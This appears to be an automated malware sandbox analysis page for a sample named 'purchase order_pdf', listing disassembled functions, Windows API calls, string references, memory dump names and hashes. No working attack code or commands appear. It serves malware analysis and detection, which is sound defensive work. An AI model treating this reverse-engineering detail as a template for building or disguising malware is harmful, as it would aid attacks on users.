Function 008F4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008F40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008F41B6

Strings

SELECTCLEAR, xrefs: 008F4235
FINDITEM, xrefs: 008F4329
DESELECT, xrefs: 008F42A4
GETSELECTEDCOUNT, xrefs: 008F4199
GETTEXT, xrefs: 008F415F
SELECTALL, xrefs: 008F421D
GETSUBITEMCOUNT, xrefs: 008F4141
ISSELECTED, xrefs: 008F41C1
GETITEMCOUNT, xrefs: 008F4128
SELECT, xrefs: 008F4250
VIEWCHANGE, xrefs: 008F4375
GETSELECTED, xrefs: 008F42E4
SELECTINVERT, xrefs: 008F4286

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 92655b76e07c6b1eca8e1084c6b3cbe6ee0af40bdc4a9764faff1a5eea2a8faf
Instruction ID: 8a80dc7363e20b124d4bcbd40d50cd8133cc1553d939574c239acc5aace512e3
Opcode Fuzzy Hash: 92655b76e07c6b1eca8e1084c6b3cbe6ee0af40bdc4a9764faff1a5eea2a8faf
Instruction Fuzzy Hash: A6A168302142199BCB14EF28C941E7AB3E5FF94314F14996AF99ADB396DB30EC45CB42

Function 008E52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 008E5309
LoadCursorW.USER32(00000000,00007F8A), ref: 008E5314
LoadCursorW.USER32(00000000,00007F00), ref: 008E531F
LoadCursorW.USER32(00000000,00007F03), ref: 008E532A
LoadCursorW.USER32(00000000,00007F8B), ref: 008E5335
LoadCursorW.USER32(00000000,00007F01), ref: 008E5340
LoadCursorW.USER32(00000000,00007F81), ref: 008E534B
LoadCursorW.USER32(00000000,00007F88), ref: 008E5356
LoadCursorW.USER32(00000000,00007F80), ref: 008E5361
LoadCursorW.USER32(00000000,00007F86), ref: 008E536C
LoadCursorW.USER32(00000000,00007F83), ref: 008E5377
LoadCursorW.USER32(00000000,00007F85), ref: 008E5382
LoadCursorW.USER32(00000000,00007F82), ref: 008E538D
LoadCursorW.USER32(00000000,00007F84), ref: 008E5398
LoadCursorW.USER32(00000000,00007F04), ref: 008E53A3
LoadCursorW.USER32(00000000,00007F02), ref: 008E53AE
GetCursorInfo.USER32(?), ref: 008E53BE
GetLastError.KERNEL32(00000001,00000000), ref: 008E53E9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 56324a89a89ae723227fd39d4fabe552000095610d643156702b6fcf36deacb4
Instruction ID: 885e1e1afb7d7ab077275c2c2095847000e41b752d913765d6fb4828460c0da3
Opcode Fuzzy Hash: 56324a89a89ae723227fd39d4fabe552000095610d643156702b6fcf36deacb4
Instruction Fuzzy Hash: 15417370E043196ADB109FBA8C49D6EFFF8FF52B54B10452FE509E7291DAB8A400CE65

Function 008CAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 008CAAA5
__swprintf.LIBCMT ref: 008CAB46
_wcscmp.LIBCMT ref: 008CAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008CABAE
_wcscmp.LIBCMT ref: 008CABEA
GetClassNameW.USER32(?,?,00000400), ref: 008CAC21
GetDlgCtrlID.USER32(?), ref: 008CAC73
GetWindowRect.USER32(?,?), ref: 008CACA9
GetParent.USER32(?), ref: 008CACC7
ScreenToClient.USER32(00000000), ref: 008CACCE
GetClassNameW.USER32(?,?,00000100), ref: 008CAD48
_wcscmp.LIBCMT ref: 008CAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 008CAD82
_wcscmp.LIBCMT ref: 008CAD96

Part of subcall function 0089386C: _iswctype.LIBCMT ref: 00893874

Strings

%s%u, xrefs: 008CAB40

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 42145a9a23fb42723482ea8a1b0b7f482d24fd9eec1f46c405d40bc0e2501549
Instruction ID: 55822af73725fa299aa7082bc84fccfdeccbd420bcffb58175c3303e6a4b43b0
Opcode Fuzzy Hash: 42145a9a23fb42723482ea8a1b0b7f482d24fd9eec1f46c405d40bc0e2501549
Instruction Fuzzy Hash: 2CA1B17160430AAFDB18DF64C884FAAB7B8FF04319F10462DFA9AD2151DB30E955CB92

Function 008CB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 008CB3DB
_wcscmp.LIBCMT ref: 008CB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 008CB414
CharUpperBuffW.USER32(?,00000000), ref: 008CB431
_wcscmp.LIBCMT ref: 008CB44F
_wcsstr.LIBCMT ref: 008CB460
GetClassNameW.USER32(00000018,?,00000400), ref: 008CB498
_wcscmp.LIBCMT ref: 008CB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 008CB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 008CB518
_wcscmp.LIBCMT ref: 008CB528
GetClassNameW.USER32(00000010,?,00000400), ref: 008CB550
GetWindowRect.USER32(00000004,?), ref: 008CB5B9

Strings

@, xrefs: 008CB3BC
ThumbnailClass, xrefs: 008CB4A3, 008CB523

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: d9318c5db7efed8d04da8de3269975837fd37bfd22393b5c0f9ae1507a432170
Instruction ID: e1540d02f0cc863aa2560d79e9432c31e17752d3303687c939ef6c97dfb6ae21
Opcode Fuzzy Hash: d9318c5db7efed8d04da8de3269975837fd37bfd22393b5c0f9ae1507a432170
Instruction Fuzzy Hash: 56818C710086499BDB04DF24C886FAABBE8FF54318F08856DFD89DA096DB34DD45CB62

Function 008CB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 008CB23F

Strings

[ACTIVE, xrefs: 008CB22C
[CLASS:, xrefs: 008CB28F
[LAST, xrefs: 008CB2EC
ALL, xrefs: 008CB2D3
[HANDLE:, xrefs: 008CB24B
REGEXP=, xrefs: 008CB254
[REGEXPTITLE:, xrefs: 008CB267
HANDLE=, xrefs: 008CB238
LAST, xrefs: 008CB204
ACTIVE, xrefs: 008CB21A
CLASSNAME=, xrefs: 008CB27C
[ALL, xrefs: 008CB2E5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 6c410acedf40324e3cfcca40321fe996b75481cbeda29be44d9a6007f1ade4ee
Instruction ID: 573a16ec9f4d269ac24bf4e5d3fe1a04fe224c8a3308890ea81977d266969727
Opcode Fuzzy Hash: 6c410acedf40324e3cfcca40321fe996b75481cbeda29be44d9a6007f1ade4ee
Instruction Fuzzy Hash: E4317E31A44629A6DB14FA64DD43FEE77B8FF10754F604029B449F10EAEF61EE04C552

Function 008CC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 008CC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008CC4E6
SetWindowTextW.USER32(?,?), ref: 008CC4FD
GetDlgItem.USER32(?,000003EA), ref: 008CC512
SetWindowTextW.USER32(00000000,?), ref: 008CC518
GetDlgItem.USER32(?,000003E9), ref: 008CC528
SetWindowTextW.USER32(00000000,?), ref: 008CC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008CC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008CC569
GetWindowRect.USER32(?,?), ref: 008CC572
SetWindowTextW.USER32(?,?), ref: 008CC5DD
GetDesktopWindow.USER32 ref: 008CC5E3
GetWindowRect.USER32(00000000), ref: 008CC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008CC636
GetClientRect.USER32(?,?), ref: 008CC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008CC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008CC693

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: f06fc5e4126720ce38c6797220dcb35f688b011ed1ab6761058d4b6cf46ccfd7
Instruction ID: aae77fe018bd0b796795888cf6d4d2f30b149a42067a10b8b4a5d09cc376d805
Opcode Fuzzy Hash: f06fc5e4126720ce38c6797220dcb35f688b011ed1ab6761058d4b6cf46ccfd7
Instruction Fuzzy Hash: E6513971900709AFDB209FA8DE85F6EBBB5FF04705F00492CE686E25A1CB74E944CB50

Function 008FA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008FA4C8
DestroyWindow.USER32(?,?), ref: 008FA542

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008FA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008FA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008FA5F1
DestroyWindow.USER32(00000000), ref: 008FA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00870000,00000000), ref: 008FA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008FA663
GetDesktopWindow.USER32 ref: 008FA67C
GetWindowRect.USER32(00000000), ref: 008FA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008FA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008FA6B3

Part of subcall function 008725DB: GetWindowLongW.USER32(?,000000EB), ref: 008725EC

Strings

tooltips_class32, xrefs: 008FA5B5, 008FA643
0, xrefs: 008FA4DE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: f0cefd434ebff9cc618f8884c1696eee21c20d0aebb6e22df52fc9c352ea658b
Instruction ID: f7259c8aa5cbdf11c1d69d57a6f805c4c25f25047721f137dc8d0b6d59521c37
Opcode Fuzzy Hash: f0cefd434ebff9cc618f8884c1696eee21c20d0aebb6e22df52fc9c352ea658b
Instruction Fuzzy Hash: 9A718AB1154209AFD724CF28C845F767BE5FB98314F08452CFA89C72A1DB78E941DB22

Function 008FC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

DragQueryPoint.SHELL32(?,?), ref: 008FC917

Part of subcall function 008FADF1: ClientToScreen.USER32(?,?), ref: 008FAE1A
Part of subcall function 008FADF1: GetWindowRect.USER32(?,?), ref: 008FAE90
Part of subcall function 008FADF1: PtInRect.USER32(?,?,008FC304), ref: 008FAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 008FC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008FC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008FC9AE
_wcscat.LIBCMT ref: 008FC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 008FC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 008FCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 008FCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 008FCA47
DragFinish.SHELL32(?), ref: 008FCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008FCB41

Strings

@GUI_DRAGFILE, xrefs: 008FCAF0
@GUI_DROPID, xrefs: 008FCA6E
@GUI_DRAGID, xrefs: 008FCAB9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 5117d7110edac60dacd9fe623f12a377adfd1378287cda537ae4a3685016ac09
Instruction ID: cf612d612669931e0c923bd33ef9dd7355b03f37d47c91c4d7be5259cb58ee2c
Opcode Fuzzy Hash: 5117d7110edac60dacd9fe623f12a377adfd1378287cda537ae4a3685016ac09
Instruction Fuzzy Hash: AC615771108304AFC711EF64DC85DABBBE8FF98710F004A2EF695921A1DB709A49CB52

Function 008F4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008F46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008F46F6

Strings

ISCHECKED, xrefs: 008F4879
UNCHECK, xrefs: 008F48D2
GETITEMCOUNT, xrefs: 008F47D8
SELECT, xrefs: 008F48A7
GETTEXT, xrefs: 008F4849
GETTOTALCOUNT, xrefs: 008F46DD
COLLAPSE, xrefs: 008F473C
EXISTS, xrefs: 008F475F
CHECK, xrefs: 008F4716
GETSELECTED, xrefs: 008F4806
EXPAND, xrefs: 008F47A8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 636ca9089ea7897c2e6d2ea5df655d3f8f761147e419de19f15668d1d347b96e
Instruction ID: 22b7bf52ca61f5f5b11c490c289599b5013b74157c3a3387c260c41fe1110364
Opcode Fuzzy Hash: 636ca9089ea7897c2e6d2ea5df655d3f8f761147e419de19f15668d1d347b96e
Instruction Fuzzy Hash: F1916C342043198FCB14EF28C451A6ABBE1FF94354F04846DE99ADB3A6DB34ED45CB42

Function 008FBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008FBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,008F6D80,?), ref: 008FBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008FBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008FBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008FBC7D
FreeLibrary.KERNEL32(?), ref: 008FBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008FBC99
DestroyIcon.USER32(?), ref: 008FBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008FBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008FBCD1

Part of subcall function 0089313D: __wcsicmp_l.LIBCMT ref: 008931C6

Strings

.icl, xrefs: 008FBAE4
.exe, xrefs: 008FBB04
.dll, xrefs: 008FBB27

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 932d84561376b712c5defff076cc052dc6cf9d88eac1e7c4b3dd485c556ba4f5
Instruction ID: da917a9e69983a1e578329772691ba17b64ce75d9e1218dda77431369efa0aeb
Opcode Fuzzy Hash: 932d84561376b712c5defff076cc052dc6cf9d88eac1e7c4b3dd485c556ba4f5
Instruction Fuzzy Hash: 09617C71500219FAEB14EF74CC85FBA7BA8FF08720F104519FA15D61D1DB74A990CBA0

Function 008DA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

CharLowerBuffW.USER32(?,?), ref: 008DA636
GetDriveTypeW.KERNEL32 ref: 008DA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008DA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008DA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008DA730

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Strings

wait, xrefs: 008DA6ED
open , xrefs: 008DA692
close, xrefs: 008DA63C
open, xrefs: 008DA65D
close cd wait, xrefs: 008DA71B
set cd door , xrefs: 008DA6D1
type cdaudio alias cd wait, xrefs: 008DA6AE
closed, xrefs: 008DA64A, 008DA653

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 7e8ed7d4506b12716db21e79c145759ac6b369f49737e02656690f12c905ebec
Instruction ID: a8fef933b0c18ab8e597e868c5012d2ca2656c7f8e97c597c168a18a577fb902
Opcode Fuzzy Hash: 7e8ed7d4506b12716db21e79c145759ac6b369f49737e02656690f12c905ebec
Instruction Fuzzy Hash: 645138721043149FC704EF28D88196AB7F4FF98718F14896DF89A97265DB31EE0ACB42

Function 008DA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008DA47A
__swprintf.LIBCMT ref: 008DA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 008DA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008DA4FE
_memset.LIBCMT ref: 008DA51D
_wcsncpy.LIBCMT ref: 008DA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008DA58E
CloseHandle.KERNEL32(00000000), ref: 008DA599
RemoveDirectoryW.KERNEL32(?), ref: 008DA5A2
CloseHandle.KERNEL32(00000000), ref: 008DA5AC

Strings

\??\%s, xrefs: 008DA496
\, xrefs: 008DA4B2
:, xrefs: 008DA4BD

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f80f92a919910c4ec7c2ee8392089fa1c549341ef256259d4270251a351f1b44
Instruction ID: 239d0512a1b7628442cdcd45ca7876791179d4d416f9f43ebaeefb2589a88d72
Opcode Fuzzy Hash: f80f92a919910c4ec7c2ee8392089fa1c549341ef256259d4270251a351f1b44
Instruction Fuzzy Hash: D5318EB650011AABDB219FA4DC49FBB73BCFF88701F2441B6FA08D6261E77096458B25

Function 008AAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 008AAB7B
___wtomb_environ.LIBCMT ref: 008AAB9D

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

__malloc_crt.LIBCMT ref: 008AABC5
__malloc_crt.LIBCMT ref: 008AABE2
_free.LIBCMT ref: 008AAC19
__recalloc_crt.LIBCMT ref: 008AAC52
__recalloc_crt.LIBCMT ref: 008AAC97
_strlen.LIBCMT ref: 008AACC3
__calloc_crt.LIBCMT ref: 008AACCD
_strlen.LIBCMT ref: 008AACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 008AAD0A
_free.LIBCMT ref: 008AAD24
_free.LIBCMT ref: 008AAD31
_free.LIBCMT ref: 008AAD43
__invoke_watson.LIBCMT ref: 008AAD5D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

